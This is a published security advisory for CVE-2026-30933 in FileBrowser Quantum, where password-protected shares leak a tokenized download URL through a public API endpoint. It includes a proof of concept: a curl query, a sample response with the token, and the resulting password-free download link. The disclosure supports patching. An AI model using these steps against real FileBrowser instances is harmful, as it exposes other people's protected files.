GHSA-525J-95GF-766F

Vulnerability from github – Published: 2026-03-09 19:48 – Updated: 2026-03-18 18:31
VLAI?
Summary
FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info
Details

Summary

The remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2.

Details

The issue stems from two flaws: 1. Tokenized download URLs are written into the persistent share model

backend/http/share.go
convertToFrontendShareResponse(line 63)
s.DownloadURL = getShareURL(r, s.Hash, true, s.Token)
  1. The public endpoint:
GET /public/api/share/info
returns shareLink.CommonShare without clearing DownloadURL.

Since Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.

The previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL

PoC

  1. Create a password protected share as an authenticated user

  2. Copy the public share URL (the clipboard WITHOUT an arrow)
    http://yourdomain/public/share/yoursharedhash
    Example:
    http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw

  3. Query the public share endpoint via curl request:
    curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*'
    Example:
    curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*'

    Response includes: { "shareTheme": "default", "title": "Shared files - test.md", "description": "A share has been sent to you to view or download.", "disableSidebar": false, "downloadURL": "http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D", "shareURL": "http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw", "enforceDarkLightMode": "default", "viewMode": "normal", "shareType": "normal", "sidebarLinks": [ { "name": "Share QR Code and Info", "category": "shareInfo", "target": "#", "icon": "qr_code" }, { "name": "Download", "category": "download", "target": "#", "icon": "download" }, { "name": "sourceLocation", "category": "custom", "target": "/srv/test.md", "icon": "" } ], "hasPassword": true, "disableLoginOption": false, "sourceURL": "/srv/test.md" } Note the response "hasPassword": true and downloadURL includes token= parameter

  4. Take the downloadURL(seen in json data response) and replace \u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering
    Example: http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D

Browser downloads file immediately without requiring password

Impact

An unauthenticated attacker can retrieve password protected shared files without the password. Results in authentication bypass, unauthorized file access and confidentiality compromise

Recommended Remediation

Sanitize DownloadURL in public share info responses via commonShare.DownloadURL = "" before returning the json response in shareInfoHandler method located in backend/share.go

Structural fix, only generate tokenized URLs after successful password validation

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gtsteffaniak/filebrowser/backend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260307130210-09713b32a5f6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30933"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-306",
      "CWE-602"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-09T19:48:12Z",
    "nvd_published_at": "2026-03-10T18:18:53Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe remediation for CVE-2026-27611 appears incomplete.  Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2.  \n\n\n### Details\nThe issue stems from two flaws:\n1. Tokenized download URLs are written into the persistent share model\n```\nbackend/http/share.go\nconvertToFrontendShareResponse(line 63)\ns.DownloadURL = getShareURL(r, s.Hash, true, s.Token)\n```\n2. The public endpoint:\n```\nGET /public/api/share/info\nreturns shareLink.CommonShare without clearing DownloadURL.\n```\n\nSince Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.\n\nThe previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL\n\n\n### PoC\n1. Create a password protected share as an authenticated user \n\n2. Copy the public share URL (the clipboard WITHOUT an arrow)  \n    `http://yourdomain/public/share/yoursharedhash`  \n    Example:   \n    `http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw`  \n\n3. Query the public share endpoint via curl request:  \n`curl \u0027http://yourdomain/public/api/share/info?hash=(your-share-hash)\u0027 -H \u0027Accept: */*\u0027  `  \nExample:  \n`curl \u0027http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw\u0027 -H \u0027Accept: */*\u0027  `  \n  \n    Response includes:\n    ```\n    {\n        \"shareTheme\": \"default\",\n        \"title\": \"Shared files - test.md\",\n        \"description\": \"A share has been sent to you to view or download.\",\n        \"disableSidebar\": false,\n        \"downloadURL\": \"http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D\",\n        \"shareURL\": \"http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw\",\n        \"enforceDarkLightMode\": \"default\",\n        \"viewMode\": \"normal\",\n        \"shareType\": \"normal\",\n        \"sidebarLinks\": [\n            {\n                \"name\": \"Share QR Code and Info\",\n                \"category\": \"shareInfo\",\n                \"target\": \"#\",\n                \"icon\": \"qr_code\"\n            },\n            {\n                \"name\": \"Download\",\n                \"category\": \"download\",\n                \"target\": \"#\",\n                \"icon\": \"download\"\n            },\n            {\n                \"name\": \"sourceLocation\",\n                \"category\": \"custom\",\n                \"target\": \"/srv/test.md\",\n                \"icon\": \"\"\n            }\n        ],\n        \"hasPassword\": true,\n        \"disableLoginOption\": false,\n        \"sourceURL\": \"/srv/test.md\"\n    }\n    ```\nNote the response \"hasPassword\": true and downloadURL includes token= parameter\n\n\n4. Take the downloadURL(seen in json data response) and replace \\u0026 with \u0026 and paste link into Incognito or private browser to ensure cookies are not interfering  \nExample:\n`http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`\n\nBrowser downloads file immediately without requiring password\n\n### Impact \nAn unauthenticated attacker can retrieve password protected shared files without the password.\nResults in authentication bypass, unauthorized file access and confidentiality compromise\n\n### Recommended Remediation\nSanitize DownloadURL in public share info responses via `commonShare.DownloadURL = \"\"` before returning the json response in shareInfoHandler method located in backend/share.go\n\nStructural fix, only generate tokenized URLs after successful password validation",
  "id": "GHSA-525j-95gf-766f",
  "modified": "2026-03-18T18:31:13Z",
  "published": "2026-03-09T19:48:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-525j-95gf-766f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30933"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gtsteffaniak/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.2.2-stable"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.1-beta"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.